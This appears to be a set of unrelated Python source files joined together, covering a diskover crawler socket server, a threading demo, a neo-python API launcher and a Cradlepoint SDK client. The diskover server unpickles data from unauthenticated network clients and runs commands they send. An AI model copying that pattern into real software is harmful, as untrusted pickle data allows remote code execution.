# Helper function to recv n bytes or return None if EOF is hit
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def _register_host(self, connection, overwrite=False):
"""
Adds an host for which connection was successfully established to the list of active hosts
:param connection: the socket object corresponding to the host
:param overwrite: if True, connections will be overwritten by new connections to the same host
"""
addr = connection.getpeername()
if addr not in self._registeredHosts or overwrite:
self._registeredHosts[addr] = connection
self._update_read_set()
else:
connection.close()
MessageEntity.logger.error('Cannot register host %s, is already registered' % formatipport(addr))
def _remove_host(self, address):
"""
Removes an host from the list of active hosts
:param address: The (ip, port) address corresponding to the host to remove
"""
if address in self._registeredHosts:
self._registeredHosts[address].close()
self._registeredHosts.pop(address, None)
self._update_read_set()
else:
MessageEntity.logger.error('Cannot remove host %s, does not exist' % formatipport(address))
def _trim_dead_sockets(self):
"""
This method removes all sockets that are in error state from the list of active hosts
Must be called every time a 'select' call fails.
"""
for sock in self._registeredHosts.values():
try:
# We perform one select call on each active socket, and if an error is encountered,
# the host is removed
select.select([sock], [], [], 0)
except select.error:
MessageEntity.logger.warning('Removing host %s due to errors' % getipport(sock))
self._remove_host(sock)
def _update_read_set(self):
"""
Updates the list of socket enabled for reading on the 'select' calls
"""
self._readSet = [self._dummy_sock_r] + list(self._registeredHosts.values())
@abstractmethod
def _listen(self):
"""
The listener method that is run by the thread for this class. Must implement the actual communication behavior
(client, server, or other) of subclasses.
"""
raise NotImplementedError('This method must be implemented')
@abstractmethod
def _update_seq_num(self, addr, seq_num, received=True):
"""
Refreshes the sequence number associated to a certain connected host
:param addr: The address of the connected host
:param seq_num: The sequence number associated to the connected host, in tuple format
:param received: If True, then the sequence number refers to a received message, and sent otherwise
"""
raise NotImplementedError('This method must be implemented')
|
diskover_socket_server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import q_crawl, adaptive_batch, config, get_time
from diskover_bot_module import scrape_tree_meta
import socket
import subprocess
try:
import queue as Queue
except ImportError:
import Queue
import threading
import uuid
import json
import time
import sys
import pickle
import struct
# dict to hold socket tasks
socket_tasks = {}
# list of socket client
clientlist = []
def socket_thread_handler(threadnum, q, cliargs, logger):
"""This is the socket thread handler function.
It runs the command msg sent from client.
"""
BUFF = 1024
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
data = clientsock.recv(BUFF)
data = data.decode('utf-8')
logger.debug('received data: %s' % data)
if not data:
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
continue
# check if ping msg
if data == 'ping':
logger.info("[thread-%s]: Got ping from %s" % (threadnum, str(addr)))
# send pong reply
message = b'pong'
clientsock.send(message)
logger.debug('sending data: %s' % message)
else:
# strip away any headers sent by curl
data = data.split('\r\n')[-1]
logger.info("[thread-%s]: Got command from %s" % (threadnum, str(addr)))
# load json and store in dict
command_dict = json.loads(data)
logger.debug(command_dict)
# run command from json data
run_command(threadnum, command_dict, clientsock, cliargs, logger)
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
except (ValueError, TypeError) as e:
q.task_done()
logger.error("[thread-%s]: Invalid JSON from %s: (%s)" % (threadnum, str(addr), e))
message = b'{"msg": "error", "error": "Invalid JSON caused by %s"}\n' % str(e).encode('utf-8')
clientsock.send(message)
logger.debug(message)
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
except socket.error as e:
q.task_done()
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recv_one_message(sock):
lengthbuf = recvall(sock, 4)
if not lengthbuf:
return None
length, = struct.unpack('!I', lengthbuf)
return recvall(sock, length)
def socket_thread_handler_twc(threadnum, q, q_kill, lock, rootdir, num_sep, level,
batchsize, cliargs, logger, reindex_dict):
"""This is the socket thread handler tree walk client function.
Stream of directory listings (pickle) from diskover treewalk
client connections are enqueued to redis rq queue.
"""
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
totalfiles = 0
while True:
data = recv_one_message(clientsock)
if not data:
break
if data == b'SIGKILL' or data == 'SIGKILL':
q_kill.put(b'SIGKILL')
break
# unpickle data sent from client
data_decoded = pickle.loads(data)
logger.debug(data_decoded)
# enqueue to redis
batch = []
for root, dirs, files in data_decoded:
files_len = len(files)
totalfiles += files_len
# check for empty dirs
if len(dirs) == 0 and len(files) == 0 and not cliargs['indexemptydirs']:
continue
batch.append((root, dirs, files))
batch_len = len(batch)
if batch_len >= batchsize or (cliargs['adaptivebatch'] and totalfiles >= config['adaptivebatch_maxfiles']):
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,),
result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (batch_len, batchsize))
del batch[:]
totalfiles = 0
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
if len(batch) > 0:
# add any remaining in batch to queue
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,), result_ttl=config['redis_ttl'])
del batch[:]
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
q.task_done()
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
def start_socket_server(cliargs, logger):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_port'] # default is 9999
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler, args=(i, q, cliargs, logger,))
t.daemon = True
t.start()
while True:
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
q.join()
serversock.close()
sys.exit(0)
def start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the start socket server tree walk function.
It opens a socket and waits for diskover tree walk client
connections.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
q_kill = Queue.Queue()
lock = threading.Lock()
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
if cliargs['twcport']:
port = cliargs['twcport']
else:
port = config['listener_twcport'] # default is 9998
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
t = threading.Thread(
target=socket_thread_handler_twc,
args=(i, q, q_kill, lock, rootdir_path, num_sep,
level, batchsize, cliargs, logger, reindex_dict,))
t.daemon = True
t.start()
starttime = time.time()
while True:
if q_kill.qsize() > 0:
logger.info("Received signal to shutdown socket server")
q.join()
serversock.close()
return starttime
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# set start time to first connection
if len(clientlist) == 1:
starttime = time.time()
# put client into Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
serversock.close()
sys.exit(0)
def run_command(threadnum, command_dict, clientsock, cliargs, logger):
"""This is the run command function.
It runs commands from the listener socket
using values in command_dict.
"""
global socket_tasks
global clientlist
# try to get index name from command or use from diskover config file
try:
index = str(command_dict['index'])
except KeyError:
index = str(config['index'])
pass
# try to get worker batch size from command or use default
try:
batchsize = str(command_dict['batchsize'])
except KeyError:
batchsize = str(cliargs['batchsize'])
pass
# try to get adaptive batch option from command or use default
try:
adaptivebatch = str(command_dict['adaptivebatch'])
except KeyError:
adaptivebatch = str(cliargs['adaptivebatch'])
pass
try:
action = command_dict['action']
pythonpath = config['python_path']
diskoverpath = config['diskover_path']
# set up command for different action
if action == 'crawl':
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-q']
elif action == 'finddupes':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--finddupes', '-q']
elif action == 'hotdirs':
index2 = str(command_dict['index2'])
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--hotdirs', index2, '-q']
elif action == 'reindex':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
path = command_dict['path']
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-R', '-q']
else:
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-r', '-q']
elif action == 'updatedirsizes':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--dircalcsonly', '-q']
else:
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '--dircalcsonly', '--maxdcdepth', '0', '-q']
elif action == 'kill':
taskid = command_dict['taskid']
logger.info("[thread-%s]: Kill task message received! (taskid:%s)",
threadnum, taskid)
# do something here to kill task (future)
message = b'{"msg": "taskkilled"}\n'
clientsock.send(message)
return
else:
logger.warning("Unknown action")
message = b'{"error": "unknown action"}\n'
clientsock.send(message)
return
# add adaptive batch
if (adaptivebatch == "True" or adaptivebatch == "true"):
cmd.append('-a')
# run command using subprocess
starttime = time.time()
taskid = str(uuid.uuid4()).encode('utf-8')
# start process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# add process to socket_tasks dict
socket_tasks[taskid] = process
message = b'{"msg": "taskstart", "taskid": "' + taskid + b'"}\n'
clientsock.send(message)
logger.info("[thread-%s]: Running command (taskid:%s)",
threadnum, taskid.decode('utf-8'))
logger.info(cmd)
output, error = process.communicate()
# send exit msg to client
exitcode = str(process.returncode).encode('utf-8')
logger.debug('Command output:')
logger.debug(output.decode('utf-8'))
logger.debug('Command error:')
logger.debug(error.decode('utf-8'))
elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')
logger.info("Finished command (taskid:%s), exit code: %s, elapsed time: %s"
% (taskid.decode('utf-8'), exitcode.decode('utf-8'), elapsedtime.decode('utf-8')))
message = b'{"msg": "taskfinish", "taskid": "%s", "exitcode": %s, "elapsedtime": "%s"}\n' \
% (taskid, exitcode, elapsedtime)
clientsock.send(message)
except ValueError:
logger.warning("Value error")
message = b'{"error": "value error"}\n'
clientsock.send(message)
pass
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
pass
|
wait_blocking.py
|
#!usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Test module to implement wait blocking to address race condition, using
threading.Condition and threading.Event.
"""
__author__ = 'Ziang Lu'
import time
from threading import Condition, Event, Thread, current_thread
# Condition
product = None # 商品
condition = Condition()
def producer() -> None:
while True:
if condition.acquire():
global product
if not product:
# 生产商品
print('Producing something...')
product = 'anything'
condition.notify()
condition.wait()
time.sleep(2)
def consumer() -> None:
while True:
if condition.acquire():
global product
if product:
# 消耗商品
print('Consuming something...')
product = None
condition.notify()
condition.wait()
time.sleep(2)
prod_thread = Thread(target=producer)
cons_thread = Thread(target=consumer)
prod_thread.start()
cons_thread.start()
# Output:
# Producing something...
# Consuming something...
# Producing something...
# Consuming something...
# ...
|
api-server.py
|
#!/usr/bin/env python3
"""
This api server runs one or both of the json-rpc and rest api. Uses
neo.api.JSONRPC.JsonRpcApi and neo.api.REST.NotificationRestApi
See also:
* Tutorial on setting up an api server: https://gist.github.com/metachris/2be27cdff9503ebe7db1c27bfc60e435
* Example systemd service config: https://gist.github.com/metachris/03d1cc47df7cddfbc4009d5249bdfc6c
* JSON-RPC api issues: https://github.com/CityOfZion/neo-python/issues/273
"""
import os
import argparse
import threading
from time import sleep
from logzero import logger
from twisted.internet import reactor, task, endpoints
from twisted.web.server import Site
from klein import Klein
from neo import __version__
from neo.Core.Blockchain import Blockchain
from neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain
from neo.Implementations.Notifications.LevelDB.NotificationDB import NotificationDB
from neo.api.JSONRPC.JsonRpcApi import JsonRpcApi
from neo.Implementations.Notifications.LevelDB.NotificationDB import NotificationDB
from neo.api.REST.NotificationRestApi import NotificationRestApi
from neo.Network.NodeLeader import NodeLeader
from neo.Settings import settings, DIR_PROJECT_ROOT
from neo.UserPreferences import preferences
# Logfile settings & setup
LOGFILE_FN = os.path.join(DIR_PROJECT_ROOT, 'api-server.log')
LOGFILE_MAX_BYTES = 5e7 # 50 MB
LOGFILE_BACKUP_COUNT = 3 # 3 logfiles history
settings.set_logfile(LOGFILE_FN, LOGFILE_MAX_BYTES, LOGFILE_BACKUP_COUNT)
# Set the PID file
PID_FILE = "/tmp/neopython-api-server.pid"
def write_pid_file():
""" Write a pid file, to easily kill the service """
f = open(PID_FILE, "w")
f.write(str(os.getpid()))
f.close()
def custom_background_code():
""" Custom code run in a background thread.
This function is run in a daemonized thread, which means it can be instantly killed at any
moment, whenever the main thread quits. If you need more safety, don't use a daemonized
thread and handle exiting this thread in another way (eg. with signals and events).
"""
while True:
logger.info("[%s] Block %s / %s", settings.net_name, str(Blockchain.Default().Height), str(Blockchain.Default().HeaderHeight))
sleep(15)
def main():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-m", "--mainnet", action="store_true", default=False,
help="Use MainNet instead of the default TestNet")
group.add_argument("-t", "--testnet", action="store_true", default=False,
help="Use TestNet instead of the default TestNet")
group.add_argument("-p", "--privnet", action="store_true", default=False,
help="Use PrivNet instead of the default TestNet")
group.add_argument("--coznet", action="store_true", default=False,
help="Use the CoZ network instead of the default TestNet")
group.add_argument("-c", "--config", action="store", help="Use a specific config file")
parser.add_argument("--port-rpc", type=int, help="port to use for the json-rpc api (eg. 10332)")
parser.add_argument("--port-rest", type=int, help="port to use for the rest api (eg. 80)")
args = parser.parse_args()
if not args.port_rpc and not args.port_rest:
print("Error: specify at least one of --port-rpc / --port-rest")
parser.print_help()
return
if args.port_rpc == args.port_rest:
print("Error: --port-rpc and --port-rest cannot be the same")
parser.print_help()
return
# Setup depending on command line arguments. By default, the testnet settings are already loaded.
if args.config:
settings.setup(args.config)
elif args.mainnet:
settings.setup_mainnet()
elif args.testnet:
settings.setup_testnet()
elif args.privnet:
settings.setup_privnet()
elif args.coznet:
settings.setup_coznet()
# Write a PID file to easily quit the service
write_pid_file()
# Instantiate the blockchain and subscribe to notifications
blockchain = LevelDBBlockchain(settings.LEVELDB_PATH)
Blockchain.RegisterBlockchain(blockchain)
dbloop = task.LoopingCall(Blockchain.Default().PersistBlocks)
dbloop.start(.1)
# Disable logging smart contract events
settings.set_log_smart_contract_events(False)
# Start the notification db instance
ndb = NotificationDB.instance()
ndb.start()
# Start a thread with custom code
d = threading.Thread(target=custom_background_code)
d.setDaemon(True) # daemonizing the thread will kill it when the main thread is quit
d.start()
# Run
reactor.suggestThreadPoolSize(15)
NodeLeader.Instance().Start()
host = "0.0.0.0"
if args.port_rpc:
logger.info("Starting json-rpc api server on http://%s:%s" % (host, args.port_rpc))
api_server_rpc = JsonRpcApi(args.port_rpc)
endpoint_rpc = "tcp:port={0}:interface={1}".format(args.port_rpc, host)
endpoints.serverFromString(reactor, endpoint_rpc).listen(Site(api_server_rpc.app.resource()))
if args.port_rest:
logger.info("Starting notification api server on http://%s:%s" % (host, args.port_rest))
api_server_rest = NotificationRestApi()
endpoint_rest = "tcp:port={0}:interface={1}".format(args.port_rest, host)
endpoints.serverFromString(reactor, endpoint_rest).listen(Site(api_server_rest.app.resource()))
app = Klein()
app.run(host, 9999)
if __name__ == "__main__":
main()
|
csclient.py
|
"""
NCOS communication module for SDK applications.
Copyright (c) 2018 Cradlepoint, Inc. <www.cradlepoint.com>. All rights reserved.
This file contains confidential information of CradlePoint, Inc. and your use of
this file is subject to the CradlePoint Software License Agreement distributed with
this file. Unauthorized reproduction or distribution of this file is subject to civil and
criminal penalties.
"""
import json
import os
import re
import select
import socket
import threading
import logging.handlers
import signal
import sys
try:
import traceback
except ImportError:
traceback = None
class SdkCSException(Exception):
pass
class CSClient(object):
"""
The CSClient class is the NCOS SDK mechanism for communication between apps and the router tree/config store.
Instances of this class communicate with the router using either an explicit socket or with http method calls.
Apps running locally on the router use a socket on the router to send commands from the app to the router tree
and to receive data (JSON) from the router tree.
Apps running remotely use the requests library to send HTTP method calls to the router and to receive data from
the router tree. This allows one to use an IDE to run and debug the application on a the computer. Although,
there are limitations with respect to the device hardware access (i.e. serial, USB, etc.).
"""
END_OF_HEADER = b"\r\n\r\n"
STATUS_HEADER_RE = re.compile(b"status: \w*")
CONTENT_LENGTH_HEADER_RE = re.compile(b"content-length: \w*")
MAX_PACKET_SIZE = 8192
RECV_TIMEOUT = 2.0
_instances = {}
@classmethod
def is_initialized(cls):
return cls in cls._instances
def __new__(cls, *na, **kwna):
""" Singleton factory (with subclassing support) """
if not cls.is_initialized():
cls._instances[cls] = super().__new__(cls)
return cls._instances[cls]
def __init__(self, app_name, init=False):
self.app_name = app_name
handlers = [logging.StreamHandler()]
if sys.platform == 'linux2':
handlers.append(logging.handlers.SysLogHandler(address='/dev/log'))
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)s: %(message)s', datefmt='%b %d %H:%M:%S',
handlers=handlers)
self.logger = logging.getLogger(app_name)
if not init:
return
def get(self, base, query='', tree=0):
"""
Constructs and sends a get request to retrieve specified data from a device.
The behavior of this method is contextual:
- If the app is installed on (and executed from) a device, it directly queries the router tree to retrieve the
specified data.
- If the app running remotely from a computer it calls the HTTP GET method to retrieve the specified data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
tree: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
if sys.platform == 'linux2':
cmd = "get\n{}\n{}\n{}\n".format(base, query, tree)
return self._dispatch(cmd).get('data')
else:
# Running in a computer so use http to send the get to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.get(device_api, auth=self._get_auth(device_ip, username, password))
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text).get('data')
def put(self, base, value='', query='', tree=0):
"""
Constructs and sends a put request to update or add specified data to the device router tree.
The behavior of this method is contextual:
- If the app is installed on(and executed from) a device, it directly updates or adds the specified data to
the router tree.
- If the app running remotely from a computer it calls the HTTP PUT method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
tree: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
value = json.dumps(value, ensure_ascii=False)
if sys.platform == 'linux2':
cmd = "put\n{}\n{}\n{}\n{}\n".format(base, query, tree, value)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the put to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.put(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def post(self, base, value='', query=''):
"""
Constructs and sends a post request to update or add specified data to the device router tree.
The behavior of this method is contextual:
- If the app is installed on(and executed from) a device, it directly updates or adds the specified data to
the router tree.
- If the app running remotely from a computer it calls the HTTP POST method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
value = json.dumps(value)
if sys.platform == 'linux2':
cmd = f"post\n{base}\n{query}\n{value}\n"
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the post to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.post(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def delete(self, base, query=''):
"""
Constructs and sends a delete request to delete specified data to the device router tree.
The behavior of this method is contextual:
- If the app is installed on(and executed from) a device, it directly deletes the specified data to
the router tree.
- If the app running remotely from a computer it calls the HTTP DELETE method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
query: Not required.
Returns:
A dictionary containing the response (i.e. {"success": True, "data:": {}}
"""
if sys.platform == 'linux2':
cmd = "delete\n{}\n{}\n".format(base, query)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the delete to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.delete(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def alert(self, value=''):
"""
Constructs and sends a custom alert to NCM for the device. Apps calling this method must be running
on the target device to send the alert. If invoked while running on a computer, then only a log is output.
Args:
app_name: String name of your application.
value: String to displayed for the alert.
Returns:
Success: None
Failure: An error
"""
if sys.platform == 'linux2':
cmd = "alert\n{}\n{}\n".format(self.app_name, value)
return self._dispatch(cmd)
else:
# Running in a computer and can't actually send the alert.
print('Alert is only available when running the app in NCOS.')
print('Alert Text: {}'.format(value))
def log(self, value=''):
"""
Adds an INFO log to the device SYSLOG.
Args:
value: String text for the log.
Returns:
None
"""
if sys.platform == 'linux2':
self.logger.info(value)
else:
# Running in a computer so just use print for the log.
print(value)
def _get_auth(self, device_ip, username, password):
# This is only needed when the app is running in a computer.
# Returns the proper HTTP Auth for the global username and password.
# Digest Auth is used for NCOS 6.4 and below while Basic Auth is
# used for NCOS 6.5 and up.
import requests
from http import HTTPStatus
use_basic = False
device_api = 'http://{}/api/status/product_info'.format(device_ip)
try:
response = requests.get(device_api, auth=requests.auth.HTTPBasicAuth(username, password))
if response.status_code == HTTPStatus.OK:
use_basic = True
except:
use_basic = False
if use_basic:
return requests.auth.HTTPBasicAuth(username, password)
else:
return requests.auth.HTTPDigestAuth(username, password)
@staticmethod
def _get_device_access_info():
# Should only be called when running in a computer. It will return the
# dev_client_ip, dev_client_username, and dev_client_password as defined in
# the sdk section of the sdk_settings.ini file.
device_ip = ''
device_username = ''
device_password = ''
if sys.platform != 'linux2':
import os
import configparser
settings_file = os.path.join(os.path.dirname(os.getcwd()), 'sdk_settings.ini')
config = configparser.ConfigParser()
config.read(settings_file)
# Keys in sdk_settings.ini
sdk_key = 'sdk'
ip_key = 'dev_client_ip'
username_key = 'dev_client_username'
password_key = 'dev_client_password'
if sdk_key in config:
if ip_key in config[sdk_key]:
device_ip = config[sdk_key][ip_key]
else:
print('ERROR 1: The {} key does not exist in {}'.format(ip_key, settings_file))
if username_key in config[sdk_key]:
device_username = config[sdk_key][username_key]
else:
print('ERROR 2: The {} key does not exist in {}'.format(username_key, settings_file))
if password_key in config[sdk_key]:
device_password = config[sdk_key][password_key]
else:
print('ERROR 3: The {} key does not exist in {}'.format(password_key, settings_file))
else:
print('ERROR 4: The {} section does not exist in {}'.format(sdk_key, settings_file))
return device_ip, device_username, device_password
def _safe_dispatch(self, cmd):
"""Send the command and return the response."""
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
sock.connect('/var/tmp/cs.sock')
sock.sendall(bytes(cmd, 'utf-8'))
return self._receive(sock)
def _dispatch(self, cmd):
errmsg = None
result = ""
try:
result = self._safe_dispatch(cmd)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "dispatch failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
self.log(self.app_name, errmsg)
pass
return result
def _safe_receive(self, sock):
sock.settimeout(self.RECV_TIMEOUT)
data = b""
eoh = -1
while eoh < 0:
# In the event that the config store times out in returning data, lib returns
# an empty result. Then again, if the config store hangs for 2+ seconds,
# the app's behavior is the least of our worries.
try:
buf = sock.recv(self.MAX_PACKET_SIZE)
except socket.timeout:
return {"status": "timeout", "data": None}
if len(buf) == 0:
break
data += buf
eoh = data.find(self.END_OF_HEADER)
status_hdr = self.STATUS_HEADER_RE.search(data).group(0)[8:]
content_len = self.CONTENT_LENGTH_HEADER_RE.search(data).group(0)[16:]
remaining = int(content_len) - (len(data) - eoh - len(self.END_OF_HEADER))
# body sent from csevent_xxx.sock will have id, action, path, & cfg
while remaining > 0:
buf = sock.recv(self.MAX_PACKET_SIZE) # TODO: This will hang things as well.
if len(buf) == 0:
break
data += buf
remaining -= len(buf)
body = data[eoh:].decode()
try:
result = json.loads(body)
except json.JSONDecodeError as e:
# config store receiver doesn't give back
# proper json for 'put' ops, body
# contains verbose error message
# so putting the error msg in result
result = body.strip()
return {"status": status_hdr.decode(), "data": result}
def _receive(self, sock):
errmsg = None
result = ""
try:
result = self._safe_receive(sock)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "_receive failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
self.log(self.app_name, errmsg)
return result
class EventingCSClient(CSClient):
running = False
registry = {}
eids = 1
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.on = self.register
self.un = self.unregister
def start(self):
if self.running:
self.log(f"Eventing Config Store {self.pid} already running")
return
self.running = True
self.pid = os.getpid()
self.f = '/var/tmp/csevent_%d.sock' % self.pid
try:
os.unlink(self.f)
except FileNotFoundError:
pass
self.event_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.event_sock.bind(self.f)
self.event_sock.listen() # backlog is optional. already set on value found in /proc
self.event_sock.setblocking(False)
self.eloop = threading.Thread(target=self._handle_events)
self.eloop.start()
def stop(self):
if not self.running:
return
self.log(f"Stopping {self.app_name}")
for k in list(self.registry.keys()):
self.unregister(k)
self.event_sock.close()
os.unlink(self.f)
self.running = False
def _handle_events(self):
poller = select.poll()
poller.register(self.event_sock,
select.POLLIN | select.POLLERR | select.POLLHUP) # I don't unregsiter this in cleaning up!
while self.running:
try:
events = poller.poll(1000)
for f, ev in events:
if ev & (select.POLLERR | select.POLLHUP):
self.log("Hangup/error received. Stopping")
self.stop() # TODO: restart w/ cached registrations. Will no longer be an error case
if ev & select.POLLIN:
conn, addr = self.event_sock.accept()
result = self._receive(conn)
eid = int(result['data']['id'])
try:
cb = self.registry[eid]['cb']
args = self.registry[eid]['args']
try:
# PUTting just a string to config store results in a json encoded string returned.
# e.g. set /config/system/logging/level "debug", result['data']['cfg'] is '"debug"'
cfg = json.loads(result['data']['cfg'])
except TypeError as e:
# Non-string path
cfg = result['data']['cfg']
try:
cb_return = cb(result['data']['path'], cfg, args)
except:
if traceback:
traceback.print_exc()
self.log(f"Exception during callback for {str(self.registry[eid])}")
if result['data']['action'] == 'get': # We've something to send back.
# config_store_receiver expects json
cb_return = json.JSONEncoder().encode(cb_return)
conn.sendall(
cb_return.encode()) # No dispatch. Config store receiver will put to config store.
except (NameError, ValueError) as e:
self.log(f"Could not find register data for eid {eid}")
except OSError as e:
self.log(f"OSError: {e}")
raise
def register(self, action: object, path: object, callback: object, *args: object) -> object:
if not self.running:
self.start()
# what about multiple registration?
eid = self.eids
self.eids += 1
self.registry[eid] = {'cb': callback, 'action': action, 'path': path, 'args': args}
cmd = "register\n{}\n{}\n{}\n{}\n".format(self.pid, eid, action, path)
return self._dispatch(cmd)
def unregister(self, eid):
ret = ""
try:
e = self.registry[eid]
except KeyError:
pass
else:
if self.running:
cmd = "unregister\n{}\n{}\n{}\n{}\n".format(self.pid, eid, e['action'], e['path'])
ret = self._dispatch(cmd)
del self.registry[eid]
return ret
